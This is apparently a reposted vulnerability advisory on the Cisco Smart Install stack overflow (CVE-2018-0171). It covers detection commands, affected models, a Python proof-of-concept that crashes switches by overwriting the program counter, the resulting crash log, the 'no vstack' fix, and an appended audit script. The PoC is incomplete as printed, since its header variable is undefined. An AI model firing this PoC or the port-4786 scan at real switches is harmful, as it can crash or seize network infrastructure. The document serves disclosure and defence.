0x01 Preface
A stack-based buffer overflow vulnerability was found in the Smart Install Client code; an attacker can exploit it to execute arbitrary code remotely without authenticating. Cisco Smart Install is a "plug-and-play" configuration and image-management feature that makes deploying new switches simple: a user can place a Cisco switch anywhere, connect it to the network and power it on, with no further configuration required. It automates the initial configuration process, provisions new switches with the currently loaded operating-system image, and provides a real-time backup whenever the configuration changes. An attacker who exploits the flaw can therefore take complete control of a vulnerable network device. Note that the feature is enabled by default on clients.
0x02 Vulnerability Description
The Smart Install Client code in Cisco IOS and IOS-XE contains a stack buffer overflow (CVE-2018-0171). An attacker can remotely send a crafted packet to TCP port 4786 to trigger the overflow on the target device, causing a denial of service (DoS) or remote code execution, and thereby take remote control of the affected device. Reportedly, TCP port 4786 is open by default on Cisco switches.
0x03 Checking for the Vulnerability
1. If a Cisco network device has TCP port 4786 open, it is exposed to attack. To find such devices, scan the target network with nmap:
nmap -p T:4786 192.168.1.0/24
2. To check whether the Smart Install Client feature is enabled on a device, look at the output of show vstack config. The following example shows the command output on Cisco Catalyst switches configured as Smart Install clients:
```
switch1# show vstack config
Role: Client (SmartInstall enabled).

switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
```
Role: Client together with Oper Mode: Enabled, or Role: Client (SmartInstall enabled), in the show vstack config output confirms that the feature is enabled on the device.
3. Run the following command on the Cisco device; if port 4786 is open, SMI is in use.
```
switch> show tcp brief all
TCB       Local Address      Foreign Address    (state)
0344B794  .4786              .*                 LISTEN
0350A018  .443               .*                 LISTEN
03293634  .443               .*                 LISTEN
03292D9C  .80                .*                 LISTEN
03292504  .80                .*                 LISTEN
```
Cisco IOS and IOS XE software version check:
```
Router> show version
Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team

ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
```
4. If you are not sure whether your device is affected, you can check it with Cisco's Cisco IOS Software Checker:
5. Use a probe script to check whether the service on the target IP and port really speaks the Cisco SMI protocol.
The protocol characteristics can be taken from what Metasploit has extracted. Sample output:
```
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected
```
0x04 Affected Scope
Affected devices:
Catalyst 4500 Supervisor Engines
Cisco Catalyst 3850 Series Switches
Cisco Catalyst 2960 Series Switches
Devices that include part of the Smart Install Client may also be affected:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
0x05 Vulnerability Verification
Below is the PoC used to verify this vulnerability:
```python
import socket
import struct
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    # TLV: 4-byte big-endian type, 4-byte big-endian length, then the value
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
    sock.send(packet)
def receive(sock):
    return sock.recv(4096)
if __name__ == "__main__":
    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con.connect((options.target, options.port))
    payload = 'BBBB' * 44
    shellcode = 'D' * 2048
    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode
    # hdr (the Smart Install message header) is not defined anywhere in the script as published
    pkt = hdr + tlv_1 + tlv_2
    print "[*] Send a malicious packet"
    send_packet(con, pkt)
```
To attack the switch, run the following command:
host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1
The switch should display a crash message and reboot:
```
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240
-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) ===
Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
Technical Support:
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
```
0x06 Impact
An attacker could cause a buffer overflow on an affected device, which may have the following effects:
Trigger a reload of the device
Allow the attacker to execute arbitrary code on the device
Put the affected device into an endless reboot loop, crashing it
0x07 Fix
```
#conf t
Enter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
```
The key command is no vstack.
Checking again, the port is now closed:
```
#show tcp brief all
TCB       Local Address      Foreign Address    (state)
075A0088  .443               .*                 LISTEN
0759F6C8  .443               .*                 LISTEN
0759ED08  .80                .*                 LISTEN
0759E348  .80                .*                 LISTEN
```
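As an added example that is not part of the original post, the following Python 3 script automates the two checks used above (show vstack config and show tcp brief all) and flags a device that still needs no vstack; the sample outputs are constructed from the ones shown in this post, and the post-fix vstack output form is an assumption.

```python
import re

SMI_PORT = 4786  # TCP port the Smart Install client listens on

# Sample CLI output. Constructed from the two `show vstack config` forms and the
# `show tcp brief all` listings shown in this post, not captured from a live device.
VSTACK_ENABLED_1 = "Role: Client (SmartInstall enabled)\n"
VSTACK_ENABLED_2 = "Capability: Client\nOper Mode: Enabled\nRole: Client\n"
VSTACK_DISABLED = "Capability: Client\nOper Mode: Disabled\nRole: NA\n"  # assumed post-fix form
TCP_BEFORE = """TCB       Local Address   Foreign Address  (state)
0344B794  .4786           .*               LISTEN
0350A018  .443            .*               LISTEN
03292D9C  .80             .*               LISTEN
"""
TCP_AFTER = """TCB       Local Address   Foreign Address  (state)
075A0088  .443            .*               LISTEN
0759ED08  .80             .*               LISTEN
"""

def smart_install_enabled(vstack_output: str) -> bool:
    """True when `show vstack config` reports an enabled client role, in either
    of the two output formats shown in the post."""
    text = " ".join(vstack_output.lower().split())  # normalise whitespace
    if re.search(r"role:\s*client\s*\(smartinstall enabled\)", text):
        return True
    return "role: client" in text and "oper mode: enabled" in text

def listening_ports(tcp_output: str) -> set:
    """Local ports in LISTEN state from `show tcp brief all` output."""
    ports = set()
    for line in tcp_output.splitlines():
        # hex TCB handle, local address ending in .<port>, foreign address, state
        m = re.match(r"\s*[0-9A-Fa-f]+\s+\S*\.(\d+)\s+\S+\s+LISTEN\b", line)
        if m:
            ports.add(int(m.group(1)))
    return ports

def audit(vstack_output: str, tcp_output: str) -> dict:
    """Combine both indicators; either one alone is enough to flag the device,
    so a listener on 4786 is reported even if the vstack output is incomplete."""
    enabled = smart_install_enabled(vstack_output)
    listening = SMI_PORT in listening_ports(tcp_output)
    return {"smi_enabled": enabled, "port_4786_listening": listening,
            "needs_no_vstack": enabled or listening}
```

Feed it the output of the two commands collected from each switch to get a per-device verdict before and after applying no vstack.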
0x08 References
Original article:
Reposted from: https://blog.51cto.com/laowafang/2095364